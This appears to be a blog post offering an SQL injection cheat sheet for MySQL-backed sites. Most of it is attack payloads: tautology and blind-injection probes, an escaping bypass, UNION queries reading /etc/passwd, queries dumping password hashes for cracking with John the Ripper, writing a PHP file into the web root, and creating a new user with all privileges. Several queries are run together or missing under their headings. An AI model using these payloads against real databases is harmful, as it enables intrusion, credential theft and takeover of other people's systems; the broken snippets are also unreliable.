This cheat sheet is only for those who understand how SQL Injection attack works, yet doesn't really care to memorize all the semantic and syntactic of the queries.
If you don't know what SQL Injection is, skip this post. If you insist to read, please go and read about SQL Injection first.
|Image from lastwatchdog.com|
Blind SQL Injection
When you're trying to enumerate, it's good to try both with and without encapsulation;
1 OR 1=1With:
1' OR '1'='1
To see if the database is handling encapsulation correctly, just throw a blind SQL
1'1and the error will tell you about encapsulation handling
Or you can use blind with EXEC
1 EXEC SP_ (or EXEC XP_)
Then to check the SQL filtering, throw these two
1 AND 1=1If both give the same result, it means filtering is not there, and the database is vulnerable
To find table names with blind injection, you have to guess the name yourself and hope for a hit. It will easier to write a script to do this for you, or use one of those blind SQL injection software available, but the basic query is
1' AND 1=(SELECT COUNT(*) FROM table_name); --table_name is the one you should be guessing
Now, it is also important to know whether the user you're masquerading as has the admin privilege
1 AND USER_NAME() = 'dbo'You will see why this is important later
If the database is has filtering enable with mysql_real_escape_string() , then you can try cancelling it out using backslash
\'; your-query-here; --
One of the main point of doing a blind SQL injection attack is to force error in the query response. One way can be done by asking for a table that does not exist
1' AND fake_table_name = '1
Most (not all) database has a table called username (blame it on the web developer), so that is one less table name you have to guess. Just try to dump all the user names from the database. Try with users and <system_name>_users as well
' OR username IS NOT NULL OR username = '
If you're lucky, you don't have to do blind injection.
Dumping SQL tables
To see the SQL version
If you get a user with admin privilege, then roll on!
List all database users (not system users!)
SELECT user FROM mysql.user;
List hash password for database users
SELECT host, user, password FROM mysql.user;Then, use a password cracker software to crack those hashes. John the Ripper is a good one
Now, you will want to dump all privileges in the databases
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
Or dump DBA accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’;
See current database
See all databases
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find table by a column's name. For example you want to find a table with a column called username
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’;
Select by row number.
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0;
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1;
To avoid quotes, use hexadecimal value instead
Read local file. For example, /etc/passwd hahaha
’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’)
Write to local file
SELECT * FROM mytable INTO dumpfile ‘/opt/lampp/htdocs/newindex.php’;
Get Hostname and IP address
Create a new user
CREATE USER newuser IDENTIFIED BY ‘pass1′;
Delete existing user
DROP USER olduser;
Make user a database admin (DBA)... wheeeeee~
GRANT ALL PRIVILEGES ON *.* TO newuser@’%';
Get location of database file
Okay, I think that's enough... too much is never good.